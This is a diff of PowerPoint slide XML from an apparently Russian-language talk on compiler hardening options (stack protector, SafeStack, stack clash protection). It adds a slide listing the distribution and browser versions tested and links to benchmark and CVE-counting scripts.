-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33536,7 +33456,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33553,17 +33473,10 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Protector: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Воспроизведение результатов</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33572,7 +33485,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33585,128 +33498,182 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включен по умолчанию только в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Windows</a:t>
+              <a:t>Версии дистрибутивов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется явно указывать флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong</a:t>
-            </a:r>
+              <a:t>Проверялись последние </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0"/>
+              <a:t>стабильные</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> версии</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты в Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ubuntu собираются с этим флагом</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (bookworm), Fedora 42, Ubuntu 24.04 (noble)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Версии браузеров</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/mozilla-firefox/firefox</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>b0ca903b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://chromium.googlesource.com/chromium/src</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>d0273f3d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в релизной сборке </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включён слабый вариант </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Protector</a:t>
+              <a:t>Замеры производительности </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Подсчёт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> CVE/KEV</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-метрик</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пруфлинки и дополнительная информация доступны в файле</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -33716,7 +33683,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7662A858-B371-4A36-A1C4-9B73D86F1E18}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD3E67F-01FC-47C1-BE9B-97F0109DAF0E}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33743,7 +33710,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293187664"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33775,7 +33742,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495A52BD-3FC7-4579-8A9D-D005960A9C1C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33793,7 +33760,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Safe Stack: </a:t>
+              <a:t>Stack Protector: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -33811,7 +33778,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA46AE-2AEA-42A0-B331-598916A3F385}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33824,28 +33791,58 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Несколько реализаций:</a:t>
+              <a:t>Включен по умолчанию только в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Windows</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>SafeStack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется явно указывать флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
@@ -33856,141 +33853,67 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=safe-stack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>наиболее распространённый флаг)</a:t>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protector-strong</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты в Debian</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ubuntu собираются с этим флагом</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel CET Shadow Stack:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> не реализован (нельзя включить ни по</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protection</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ни по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>–</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>mshstk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ShadowCallStack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=shadow-call-stack</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Защита не включена по умолчанию в дистрибутивах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и браузерах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome/Firefox</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в релизной сборке </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включён слабый вариант </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Protector</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33999,7 +33922,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8A2AE2-629B-42FD-9E28-E4A1D19A5BF3}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7662A858-B371-4A36-A1C4-9B73D86F1E18}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34026,7 +33949,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796431697"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293187664"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34058,7 +33981,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495A52BD-3FC7-4579-8A9D-D005960A9C1C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34076,11 +33999,11 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clashing: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как использовать</a:t>
+              <a:t>Safe Stack: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34094,7 +34017,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA46AE-2AEA-42A0-B331-598916A3F385}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34108,48 +34031,24 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включен по умолчанию только в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang)</a:t>
+              <a:t>Несколько реализаций:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется явно указывать флаг </a:t>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>SafeStack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -34163,29 +34062,59 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-clash-protection</a:t>
-            </a:r>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=safe-stack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>наиболее распространённый флаг)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты в Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> Fedora</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel CET Shadow Stack:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> не реализован (нельзя включить ни по</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34193,144 +34122,78 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ubuntu собираются с этим флагом</a:t>
+              <a:t>ни по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>–</a:t>
+            </a:r>
+            <a:r>
